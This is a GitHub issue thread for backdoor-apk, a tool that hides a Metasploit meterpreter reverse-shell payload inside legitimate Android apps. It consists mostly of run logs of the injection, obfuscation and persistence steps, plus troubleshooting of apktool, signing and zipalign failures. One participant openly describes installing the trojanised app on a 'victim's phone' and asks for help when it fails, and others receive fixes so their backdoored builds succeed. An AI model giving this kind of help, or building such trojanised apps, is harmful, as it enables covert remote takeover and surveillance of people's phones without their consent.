### ISSUE TITLE
apktool errors on recompilation of original APK file

### ISSUE THREAD

**Issue by devrajashwin** [dana-at-cp/backdoor-apk#30]
i think the problem is apk signer 
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.42.16:4444
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

**Comment by dana-at-cp** [comment]
Can you run the following from the command line on your Kali Linux instance?

# which jarsigner

Share the output.

**Comment by devrajashwin** [comment]
u meann log file 
ok here its is 
[run.log.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/434584/run.log.tar.gz)

**Comment by dana-at-cp** [comment]
So, this run.log file has the same error as the other open issue. Like I said in the other thread, this is an error being thrown by apktool:

```
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_3719675217367634065.tmp, p, --forced-package-id, 127, $
        at brut.androlib.Androlib.buildResourcesFull(Androlib.java:437)
        at brut.androlib.Androlib.buildResources(Androlib.java:371)
        at brut.androlib.Androlib.build(Androlib.java:281)
        at brut.androlib.Androlib.build(Androlib.java:254)
        at brut.apktool.Main.cmdBuild(Main.java:224)
        at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_3719675217367634065.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 22, $
        at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:436)
        at brut.androlib.Androlib.buildResourcesFull(Androlib.java:423)
        ... 5 more
Caused by: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_3719675217367634065.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 22, --version-code, 35, --version-nam$
        at brut.util.OS.exec(OS.java:97)
        at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:430)
        ... 6 more
Caused by: java.io.IOException: Cannot run program "/tmp/brut_util_Jar_3719675217367634065.tmp": error=2, No such file or directory
        at java.lang.ProcessBuilder.start(ProcessBuilder.java:1048)
        at brut.util.OS.exec(OS.java:90)
        ... 7 more
Caused by: java.io.IOException: error=2, No such file or directory
        at java.lang.UNIXProcess.forkAndExec(Native Method)
        at java.lang.UNIXProcess.<init>(UNIXProcess.java:248)
        at java.lang.ProcessImpl.start(ProcessImpl.java:134)
        at java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)
        ... 8 more
Forcing cleanup due to a failure or error state!
```

**Comment by dana-at-cp** [comment]
Try running the cleanup.sh script before running the backdoor-apk.sh script.

**Comment by dana-at-cp** [comment]
Also, did you modify the apktool program that the backdoor-apk.sh script uses?

**Comment by devrajashwin** [comment]
no i did not changed any thing in the script

plz re patch it for me and thsnx

**Comment by dana-at-cp** [comment]
As of right now, there is nothing to patch. The issue is isolated to apktool and the root cause remains unclear. Attach the the APK file when you have a chance.

**Comment by devrajashwin** [comment]
how to do that plz bor help me

**Comment by dana-at-cp** [comment]
You could try one of these methods:

http://receivetipstricks.com/extract-apk-android/

I have personally used Airdroid to pull APK files from Android devices and it works well.

**Comment by devrajashwin** [comment]
yes is now is used Es file explorer to make an apk backup intsaled on my phone ,
but i got same error again ,
check out the sceen shot ans runlog
![screenshot from 2016-08-27 21-21-27](https://cloud.githubusercontent.com/assets/20875171/18028421/6ce7b808-6c6e-11e6-8008-548860405a9e.png)
[run.log.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/440732/run.log.tar.gz)

**Comment by dana-at-cp** [comment]
Attach one of the APK files that doesn't recompile for you.

**Comment by devrajashwin** [comment]
ok here is the apk file 
[Limbo_0.9.7.apk.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/445465/Limbo_0.9.7.apk.tar.gz)

**Comment by dana-at-cp** [comment]
So, the APK file you provided was processed fine by the current version of backdoor-apk on my Kali Linux system:

```
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh Limbo_0.9.7.apk 
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 10.6.9.31:1337
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk#
```

**Comment by devrajashwin** [comment]
but why its not working on my kali linux rolling
plz tell and help me

**Comment by dana-at-cp** [comment]
One thing to try ... make sure the "ia32-libs" are installed on your Kali Linux system:

```
apt-get install lib32z1 lib32ncurses5
```

**Comment by devrajashwin** [comment]
" i have installed  apt-get install lib32z1 lib32ncurses5 "
and tested it again but smae problem
i really dont know ehat to do now i fedup with this problem ........


root@localhost:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh Limbo_0.9.7.apk
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.43.4 :4444
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

**Comment by dana-at-cp** [comment]
Hmm ... that's really strange. Any chance you had a typo in your public IP entry?

**Comment by devrajashwin** [comment]
sir when i use public ip in backdoor.py ,
its give me the error like this ,

i think the problem is apk signer
[] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.42.16:4444
[] Decompiling RAT APK file...done.
[] Decompiling original APK file...done.
[] Merging permissions of original and payload projects...done.
[] Running proguard on RAT APK file...done.
[] Decompiling obfuscated RAT APK file...done.
[] Creating new directories in original project for RAT smali files...done.
[] Copying RAT smali files to new directories in original project...done.
[] Fixing RAT smali files...done.
[] Obfuscating const-string values in RAT smali files...done.
[] Locating smali file to hook in original project...done.
[] Adding hook in original smali file...done.
[] Adding persistence hook in original project...done.
[] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

**Comment by dana-at-cp** [comment]
@devrajashwin What is backdoor.py? That's not a script from this project.

**Comment by devrajashwin** [comment]
sir ,
imean ,
when i edit file backdoor.py and i used my public ip in that  for  Handle the reverse connection
and then i try to recreate the orignal apk in to rat ,
its gives me an error,

[!] Failed to recompile original project with backdoor,


"that mean according to read me ,
we have to chage th ip in that backdoor.py file right  ,
iam talking about that"

**Comment by dana-at-cp** [comment]
I imagine that some bad or extra characters are making there way into the file somehow when you edit. For instance, are you editing the file on Windows and then dropping it back in Kali Linux?

**Comment by devrajashwin** [comment]
no sir ur are mistaken ,
iam kali riolling is dual booted ,
iam not editing the file in windows ,iam eiting it in kali rollin only,
"note: i am  not using any kind of vmware to start the kalli linux,......"

i suggest u to use 
2nd thing is ur are using ur "ifconfig" ip to built it ,
insted of use the "whats my ip" /"Your public IP address"
then complie the apk see whats happens

**Comment by dana-at-cp** [comment]
I'm going to make some changes to the script that will prompt for the IP address or hostname and port details. If you still experience the same problem after this new version is released then please open a new issue.

**Comment by anthonychaseparsons1** [comment]
Ive had this exact issues before. Doing some research, I found that updating lib32 files, it worked flawlessly. Here are your commands.

sudo apt-get install lib32zl lib32ncurses5 lib32stdc++6

Also be sure to check your apktool version simply by typing apktool.

Here is all the steps I took to sucessfully configure backdoor-apk

apt-get update

Update apktool (Found on website)

sudo chmod +x

sudo apt-get install lib32zl lib32ncurses5 lib32stdc++6

sudo git clone https://github.com/dana-at-cp/backdoor-apk.git

sudo chmod a+x backdoor-apk.sh

If you are still having issues I would gladly assist you by email. anthonychaseparsons1@hotmail.com

**Comment by dana-at-cp** [comment]
@anthonychaseparsons1 Thanks for taking the time to share your experience and solution with other users. I truly appreciate it.

**Comment by Abdulmalik5371** [comment]
Hi guys, am having the same issue on Kali Linux. Please Help and when i try updating lib32 files, it denies.

[*] Running backdoor-apk.sh v0.1.5 on Sat Oct 22 16:27:36 EDT 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3           
[?] Please enter an LHOST value: xxxxxxxxxxxxxx
[?] Please enter an LPORT value: xxxxxx
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: xxxxxxxxxxxx
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor
root@Kali:~/Desktop/backdoor-apk-master/backdoor-apk# apt-get install lib32z1 lib32ncurses5
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package lib32z1
E: Unable to locate package lib32ncurses5
 
Please help

**Comment by anthonychaseparsons1** [comment]
Did you try the command I posted earlier?
sudo apt-get install lib32zl lib32ncurses5 lib32stdc++6

**Comment by Abdulmalik5371** [comment]
Anthonychaseparsons1,
Thanks i got the install and it worked for me. But am having a problem,when i try to install the signed apk in the victims phone it says install failed. If you have solution for that please help. I tried today with adobe reader apk and it worked but after opening the application on victim phone it says "unfortunately adobe reader stopped workining"  Kindly help because i cant seem to know the problem

**Comment by Miko90** [comment]
[*] Running backdoor-apk.sh v0.1.9 on Sat Jan 21 09:18:02 EST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: xxxxx
[?] Please enter an LPORT value: xxxx
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[!] Failed to align recompiled APK     ========> Why is giving error please help me
root@kali:~/backdoor-apk/backdoor-apk#

**Comment by derinempati** [comment]
miko30  zipalign install

**Comment by netship01** [comment]
I: Building resources...
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 139): [/usr/bin/aapt, p, --min-sdk-version, 9, --target-sdk-version, 21, --version-code, 53156713, --version-name, 34.0.0.13.68, -F, /tmp/APKTOOL3447691795823034561.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/Desktop/original/res, -M, /root/Desktop/original/AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:478)
	at brut.androlib.Androlib.buildResources(Androlib.java:412)
	at brut.androlib.Androlib.build(Androlib.java:311)
	at brut.androlib.Androlib.build(Androlib.java:264)
	at brut.apktool.Main.cmdBuild(Main.java:227)
	at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 139): [/usr/bin/aapt, p, --min-sdk-version, 9, --target-sdk-version, 21, --version-code, 53156713, --version-name, 34.0.0.13.68, -F, /tmp/APKTOOL3447691795823034561.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/Desktop/original/res, -M, /root/Desktop/original/AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:439)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:464)
	... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 139): [/usr/bin/aapt, p, --min-sdk-version, 9, --target-sdk-version, 21, --version-code, 53156713, --version-name, 34.0.0.13.68, -F, /tmp/APKTOOL3447691795823034561.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/Desktop/original/res, -M, /root/Desktop/original/AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:95)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:433)
	... 6 more


This error pop even when decompiling and recompiling original apk

**Comment by netship01** [comment]
Solved by updating apktool and installing libs.

**Comment by kitemmurt** [comment]
[*] Running backdoor-apk.sh v0.2.2 on gio 11 mag 2017, 10.41.29, CEST
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: intelligenc100.ddns.net
[?] Please enter an LPORT value: 1336
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
date: data "Sat Feb 09 22:48:01 2041" non valida
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[!] Failed to align recompiled APK

I ever have the problem with the date and align every apk i use and thi the log 
Value of validity: -15994
Errore keytool: java.lang.Exception: La validità deve essere maggiore di zero
Retrying RSA key generation without original APK cert from date and validity values
jar signed.

Warning: 
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-09-2) or after any future revocation date.

jar verified.

Warning: 
This jar contains entries whose certificate chain is not validated.
This jar contains signatures that does not include a timestamp. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-09-2) or after any future revocation date.

Re-run with the -verbose and -certs options for more details.
./backdoor-apk.sh: riga 662: third-party/android-sdk-linux/build-tools/25.0.2/zipalign: cannot execute binary file: Formato eseguibile non valido
Forcing cleanup due to a failure or error state!

**Comment by srv551** [comment]
I am getting **msfvenom** error....how to solve it ?
![screenshot 11](https://user-images.githubusercontent.com/32248262/31025485-6d47e7e2-a560-11e7-85ad-737846bcc32f.png)

**Comment by error-dr** [comment]
plz dana-at-cp help me 
[*] Running backdoor-apk.sh v0.2.3 on Fri Nov 17 03:21:14 EST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.15
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[!] Failed to decompile original APK file

**Comment by Palmus84** [comment]
Hi everybody. I've the same issue of "Srv551": couldn't find msvenom (in backdoor-apk v0.2.3). Any idea for solve it? Thanks.

**Comment by LinkG** [comment]
@Palmus84 make sure you have the metasploit framework installed

**Comment by Palmus84** [comment]
Yes, I checked and I've it. 
(https://github.com/rapid7/metasploit-framework.wiki.git)

**Comment by LinkG** [comment]
@Palmus84 you need to install it, not just clone it. For example the binaries should be in your PATH for it to work, I would recommend using a Linux distro and installing metasploit framework through their package manager

**Comment by Palmus84** [comment]
Thank you so much. I'll search the way to do it and I'try!

Palmo Baio.

________________________________

**Comment by SuhasWaydande9** [comment]
Failed to recompile original project with backdoor

log file =
[run.log](https://github.com/dana-at-cp/backdoor-apk/files/3007428/run.log)

i tried to recompile with apktool separately and it failed several times, then i tried to Change the Output name of Original apk and it Worked.

does this have to do anything with recompiling Error.
and what kind of changes i have to make in your backdoor-apk.sh script to make it work.
